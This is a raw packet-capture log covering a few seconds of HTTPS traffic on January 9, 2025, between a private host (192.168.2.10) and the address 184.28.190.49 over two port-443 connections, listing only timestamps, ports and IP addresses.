Jan 9, 2025 14:56:19.077094078 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.077111006 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.077127934 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.077142000 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.082741022 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.109327078 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.109435081 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.118248940 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.118248940 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.118622065 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.159194946 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.169646025 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.219619036 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.229677916 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.229696035 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.231190920 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.231533051 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.348522902 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.348810911 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.349359035 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.349502087 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.350111961 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.350372076 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.385560989 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.387835026 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.387850046 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.388081074 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.388092995 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.388179064 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.467586040 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.467600107 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.467609882 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.467659950 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.467813015 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.467824936 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.468626022 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.497505903 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.497520924 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.497530937 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.497543097 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.497554064 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.497776031 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.532087088 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.532104015 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.532161951 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.532172918 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.532182932 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.539150953 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.539213896 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.539282084 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.539292097 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.545766115 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.545778990 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.545789957 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.545802116 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.553863049 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.553874969 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.553924084 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.553937912 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.553951979 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.553966045 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.562479019 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.562490940 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.562499046 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.570569038 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.570833921 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.570846081 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.570858955 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.570919991 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.570935011 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.570946932 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.570990086 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.571002960 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.571013927 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.571026087 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.582254887 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.582284927 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.582307100 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.582319021 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.582331896 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.582341909 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.582355022 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.582390070 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.582406044 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.582417965 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.582432032 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.582520962 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.690603971 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.751923084 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.751990080 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.752113104 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.752221107 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.752432108 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.752432108 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.752497911 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.753598928 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.754259109 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.754473925 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.754570961 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.755075932 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.757958889 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.758297920 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.758619070 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.765841007 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.777597904 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.778928041 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.851217985 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.852149010 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.859991074 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.881373882 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:19.913176060 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.914081097 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:19.972440004 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.010797977 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.018213034 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.018228054 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.018239975 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.019463062 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.019705057 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.020762920 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.020900965 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.020922899 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.020935059 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.020972967 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.020984888 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.020996094 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.024444103 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.024694920 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.024765968 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.024765968 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.080693960 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090051889 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090132952 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090239048 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090251923 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090265036 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090277910 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090346098 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090359926 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090373993 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090426922 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090492010 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090503931 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090511084 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090590000 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090603113 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090615034 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090629101 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090681076 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.090694904 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.093955040 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.093955040 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.095801115 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.095817089 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.095900059 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.095911980 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.095923901 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.095941067 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.095954895 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.095968008 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.095985889 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.095999956 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.102133989 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.102150917 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.102163076 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.102176905 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.102256060 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.102499962 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.102513075 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.102526903 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.102540970 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.102837086 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.107651949 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.107666016 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.107686996 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.107698917 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.107709885 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.107721090 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.107721090 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.107780933 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.107793093 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.107805967 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.107817888 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.107963085 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.107976913 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.112941027 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.112987041 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.113001108 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.113007069 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.113512039 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.113524914 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.113822937 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.120676041 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.120789051 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.122761011 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.150963068 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.224210978 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.226252079 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.226263046 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.226619959 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.289119005 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.289134979 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.289143085 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.289518118 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.290013075 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.297882080 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.298115015 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.298129082 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.298139095 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.299140930 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.299282074 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.335194111 CET	55838	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.395375013 CET	443	55838	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.415891886 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.532924891 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.532942057 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.532963991 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.532978058 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.532998085 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.533011913 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.533023119 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.533461094 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.558020115 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.558346033 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.670857906 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.670871019 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.678594112 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.678796053 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.678807974 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.678886890 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.678899050 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.678929090 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.678941965 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.679008007 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.679020882 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.679033041 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.679136038 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.679150105 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.679160118 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.679301977 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.679621935 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.710491896 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:20.801799059 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:20.974385977 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.075535059 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.098658085 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.098789930 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.098810911 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.098826885 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.098839998 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.098855019 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.098916054 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.099037886 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.099051952 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.099062920 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.099545956 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.139622927 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.173696995 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.349109888 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350635052 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350646973 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350661993 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350677013 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350688934 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350702047 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350713015 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350720882 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350733995 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350747108 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350759983 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350771904 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350785017 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350797892 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350811005 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350825071 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.350837946 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.351368904 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.351368904 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.351500034 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.351500034 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.376008987 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.660372019 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.754019022 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.757505894 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.862205982 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.862215996 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.868380070 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.879626036 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.879652977 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.879714966 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.879729986 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.879744053 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.879801035 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.879813910 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.879825115 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.879837990 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.879852057 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.879882097 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.880719900 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.880758047 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.880772114 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.880815029 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.880831003 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.880844116 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.880858898 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.880872965 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.880886078 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.880923033 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.886559010 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.886584997 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.886600018 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.886713028 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.886831045 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.886842966 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.886862993 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.886933088 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.886946917 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.886965036 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.890271902 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.890671015 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.891225100 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.891681910 CET	54149	443	192.168.2.10	184.28.190.49
Jan 9, 2025 14:56:21.893210888 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.893295050 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.893399954 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.893413067 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.893419027 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.893429995 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.893443108 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.893455982 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.893501997 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.893513918 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.899790049 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.899852991 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.899864912 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.899887085 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.899899006 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.899916887 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.899930954 CET	443	54149	184.28.190.49	192.168.2.10
Jan 9, 2025 14:56:21.899960041 CET	443	54149	184.28.190.49	192.168.2.10
